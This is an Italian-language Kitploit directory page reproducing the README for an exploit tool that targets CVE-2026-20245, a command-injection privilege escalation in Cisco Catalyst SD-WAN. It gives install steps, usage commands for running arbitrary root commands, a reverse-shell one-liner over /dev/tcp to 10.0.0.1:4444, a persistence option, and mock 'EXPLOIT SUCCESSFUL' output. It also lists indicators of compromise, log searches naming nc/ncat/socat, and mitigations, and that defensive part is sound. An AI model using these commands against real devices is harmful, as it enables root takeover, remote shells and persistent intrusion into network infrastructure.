Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-20245---Cisco-SD-WAN-Privilege-Escalation-Exploit — **Questo codice è SOLO per scopi educativi e test di sicurezza autorizzati.** | Kitploit
Strumenti/GitHubGitHub/fevar54/cve-2026-20245---cisco-sd-wan-privilege-escalation-exploit
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza di RetePenetration TestingCommand and ControlApprendimento e Formazione

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
GitHub
fevar54/cve-2026-20245---cisco-sd-wan-privilege-escalation-exploit

CVE-2026-20245---Cisco-SD-WAN-Privilege-Escalation-Exploit

**Questo codice è SOLO per scopi educativi e test di sicurezza autorizzati.**

Vedi Repository
343 mesi faNon ancora revisionato

CVE-2026-20245 - Exploit di escalation dei privilegi Cisco SD-WAN

Security Rating CVSS CISA KEV

⚠️ AVVERTENZA

Questo codice è SOLO per scopi educativi e test di sicurezza autorizzati.

📋 Descrizione

CVE-2026-20245 è una vulnerabilità di escalation dei privilegi nella CLI di Cisco Catalyst SD-WAN Controller (vSmart), Cisco Catalyst SD-WAN Manager (vManage) e Cisco Catalyst SD-WAN Validator (vBond). Un attaccante autenticato con privilegi netadmin può eseguire comandi arbitrari come root tramite il caricamento di un file appositamente progettato.

Dettagli Tecnici

🎯 Versioni Affette

ProdottoVersioni vulnerabili
Cisco Catalyst SD-WAN Manager< 20.18.3.1
Cisco Catalyst SD-WAN Controller (vSmart)< 20.18.3.1
Cisco Catalyst SD-WAN Validator (vBond)< 20.18.3.1

Versioni specifiche vulnerabili:

  • 20.9.x (tutte)
  • 20.10.x - 20.12.5.3
  • 20.12.6 - 20.12.6.1
  • 20.12.7
  • 20.13.x - 20.15.4.3
  • 20.15.5 - 20.15.5.1
  • 20.16.x - 20.18.2.1

🔧 Installazione

root@kitploit:~
# Clonar repositorio
git clone https://github.com/username/CVE-2026-20245-PoC
cd CVE-2026-20245-PoC

# Instalar dependencias
pip install -r requirements.txt

# Dar permisos
chmod +x exploit.py
📦 Dipendenze
txt
requests>=2.31.0
🚀 Utilizzo
### Verificar versión
bash
python3 exploit.py -t 192.168.1.1 -u netadmin -p password --check-only
### Esegui comando
bash
python3 exploit.py -t 192.168.1.1 -u netadmin -p password -c "id"
### Reverse shell
bash
python3 exploit.py -t 192.168.1.1 -u netadmin -p password -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"
### Installa persistenza
bash
python3 exploit.py -t 192.168.1.1 -u netadmin -p password -c "whoami" --persist
🔍 Output atteso
text
╔═══════════════════════════════════════════════════════════════════╗
║  CVE-2026-20245 - Cisco SD-WAN Privilege Escalation Exploit     ║
║  Command Injection via Crafted File Upload                       ║
║  CVSS: 7.8 (High) | CISA KEV: 2026-06-09                        ║
╚═══════════════════════════════════════════════════════════════════╝

[*] Authenticating to 192.168.1.1...
[+] Authentication successful
[+] XSRF Token obtained
[*] Attempting to execute: id
[*] Trying endpoint: /system/device/upload
[*] Uploading malicious file...
[+] File uploaded successfully
[*] Triggering command injection...
[+] Trigger response: 200
[+] Command injection successful via /system/device/upload

============================================================
[✓] EXPLOIT SUCCESSFUL
[✓] Command executed as root
[!] System is VULNERABLE - Apply Cisco patch immediately
============================================================
🔍 Indicatori di Compromissione (IOC)
### Verifica nei logs (/var/log/scripts.log)
bash
# Buscar actividad sospechosa
grep -E "\.csv|malicious|upload_serial" /var/log/scripts.log

# Comandos específicos a buscar
Apr 15 09:44:57 vmanage vScript: /usr/bin/vconfd_script_upload_tenant_list.sh -cli path /home/admin/malicious.csv
### File sospetti
/home/admin/*.csv (file CSV non autorizzati)

/tmp/*.csv

/var/log/scripts.log con voci insolite

### Processi
bash
# Buscar procesos root inusuales
ps aux | grep -E "bash|sh|nc|ncat|socat"
🛡️ Mitigazione
### Opzione 1 - Aggiorna alla versione corretta (RACCOMANDATO)
| Versione | Release corretta |
|----------|------------------|
| 20.18.2.1 e precedenti | 20.18.3.1 |
### Opzione 2 - Limita l'accesso
- Limita l'accesso amministrativo alla rete di gestione
- Usa autenticazione multifattore
- Monitora l'attività di upload CSV

### Opzione 3 - Configurazione sicura
text
# Deshabilitar upload de serial numbers si no es necesario
no feature upload-serial-numbers

# Limitar privilegios netadmin
admin privilege restrict
📚 Riferimenti
- Cisco Security Advisory
- NVD - CVE-2026-20245
- CISA KEV Catalog

📊 Cronologia
| Data | Evento |
|------|--------|
| 2026-05-14 | Cisco pubblica advisory iniziale |
| 2026-06-04 | CVE pubblicato ufficialmente |
| 2026-06-09 | CISA aggiunge a KEV |
| 2026-06-23 | Data limite CISA per la patch |

⚖️ Disclaimer
Questo software viene fornito "così com'è", senza garanzie. L'autore non è responsabile per l'uso improprio. Usalo solo su sistemi autorizzati.
Scarica lo strumento
CampoValore
CVECVE-2026-20245
CVSS7.8 (High)
VectorAV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
ComponenteCLI / CSV Upload
TipoCommand Injection (CWE-116)